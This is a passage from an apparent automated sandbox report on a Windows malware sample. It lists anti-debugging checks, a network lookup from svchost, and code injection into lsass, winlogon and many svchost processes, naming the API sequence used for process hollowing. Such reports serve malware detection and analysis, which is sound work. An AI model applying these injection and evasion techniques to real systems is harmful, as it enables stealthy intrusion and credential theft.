                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_00007FFAAC564A02 CheckRemoteDebuggerPresent,1_2_00007FFAAC564A02
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F597D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_000002616F597D90
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F59FDA0 GetProcessHeap,1_2_000002616F59FDA0
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F597D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_000002616F597D90
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F5A6218 SetUnhandledExceptionFilter,1_2_000002616F5A6218
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F59D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_000002616F59D814
                Source: C:\Windows\System32\svchost.exeCode function: 5_2_00000216819BD814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00000216819BD814
                Source: C:\Windows\System32\svchost.exeCode function: 5_2_00000216819B7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00000216819B7D90
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_000001CA7D1E7D90
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1ED814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_000001CA7D1ED814
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1F6218 SetUnhandledExceptionFilter,6_2_000001CA7D1F6218
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C07D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00000265B3C07D90
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C0D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00000265B3C0D814
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C16218 SetUnhandledExceptionFilter,8_2_00000265B3C16218
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD5D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0000017D2DD5D814
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD66218 SetUnhandledExceptionFilter,9_2_0000017D2DD66218
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD57D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0000017D2DD57D90
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B92D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0000022F4B92D814
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B927D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0000022F4B927D90
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE2727D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0000013DE2727D90
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE2736218 SetUnhandledExceptionFilter,11_2_0000013DE2736218
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE272D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0000013DE272D814
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CAD814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000262F1CAD814
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB6218 SetUnhandledExceptionFilter,14_2_00000262F1CB6218
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CA7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000262F1CA7D90
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E157D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000002234E157D90
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E166218 SetUnhandledExceptionFilter,15_2_000002234E166218
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E15D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000002234E15D814
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942B17D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000023942B17D90
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942B1D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000023942B1D814
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056DD814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_000001EF056DD814
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056E6218 SetUnhandledExceptionFilter,17_2_000001EF056E6218
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056D7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_000001EF056D7D90
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD7D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000002287AD7D814
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD77D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000002287AD77D90
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD86218 SetUnhandledExceptionFilter,18_2_000002287AD86218
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA9D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001B94DA9D814
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA97D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001B94DA97D90
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000025202586218 SetUnhandledExceptionFilter,20_2_0000025202586218
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002520257D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002520257D814
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000025202577D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0000025202577D90
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001A9EBFCD814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001A9EBFCD814
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001A9EBFC7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001A9EBFC7D90
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF1637D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000019FF1637D90
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF163D814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000019FF163D814
                Source: C:\Users\user\Desktop\r8k29DBraE.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\System32\svchost.exeDomain query: i.ibb.co
                .NET source code references suspicious native API functions
                Source: 1.2.r8k29DBraE.exe.2616e810000.11.raw.unpack, aq-rvqt-9ov-hv8-iamz6-p-2-e.csReference to suspicious API methods: LoadLibrary("kernel32.dll")
                Source: 1.2.r8k29DBraE.exe.2616e810000.11.raw.unpack, aq-rvqt-9ov-hv8-iamz6-p-2-e.csReference to suspicious API methods: GetProcAddress(intPtr, "IsDebuggerPresent")
                Source: 1.2.r8k29DBraE.exe.2616e810000.11.raw.unpack, aq-rvqt-9ov-hv8-iamz6-p-2-e.csReference to suspicious API methods: OpenProcess(1024u, 0, GetCurrentProcessId())
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, didyoumissme.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\lsass.exe base: 17D2DD20000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22F4B8F0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\dwm.exe base: 262F1EA0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23942AE0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1EF056A0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2287AD40000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B94DA60000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25202540000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A9EBF90000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19FF1600000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A76A170000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14D26990000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2175D5C0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B0AB960000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2129B2A0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26384180000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25178730000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1495FCF0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22125D90000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 297A5D80000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2D0F41C0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C325340000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AEFC900000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 270F3530000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D326280000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16131E60000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AE137C0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C93A3B0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E2E4190000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 1450000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AB68FA0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 265951C0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C263510000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2234E120000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18198580000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19E8E330000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B5A2950000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD340C0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B653790000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B19A0E0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24730B30000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15F35DA0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\sihost.exe base: 200792F0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18CE9170000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D959540000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18F1A9A0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FF01350000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 221D2530000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D400530000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\explorer.exe base: 8700000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27844DD0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 258B00D0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FA9A260000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1496A4A0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 190043F0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B8E5260000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 189090B0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB06E0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 212DAEE0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1EF4F460000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E594900000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 18C88430000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18FE0970000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FDE2F60000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2675A1B0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Users\user\Desktop\r8k29DBraE.exe base: 2616F300000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Users\user\Desktop\wzcsapi.exe base: 1CE10000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21681980000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\WerFault.exe base: 265B3BD0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13DE26F0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BE3D690000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 25731DD0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\conhost.exe base: 19417AC0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1B0FE9F0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1B0FEA20000 protect: page execute and read and writeJump to behavior
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_00007FF6B5AD1C80 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,4_2_00007FF6B5AD1C80
                Creates a thread in another existing process (thread injection)
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\lsass.exe EIP: 2DD22750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 4B8F2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\dwm.exe EIP: F1EA2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 42AE2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 56A2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 7AD42750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 4DA62750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 2542750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: EBF92750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: F1602750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 6A172750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 26992750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D5C2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: AB962750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 9B2A2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 84182750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 78732750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 5FCF2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 25D92750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: A5D82750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: F41C2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 25342750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: FC902750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: F3532750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 26282750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: C:\Windows\System32\svchost.exe EIP: 31E62750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 137C2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 3A3B2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: E4192750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 1452750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 68FA2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 951C2750Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeThread created: unknown EIP: 63512750Jump to behavior
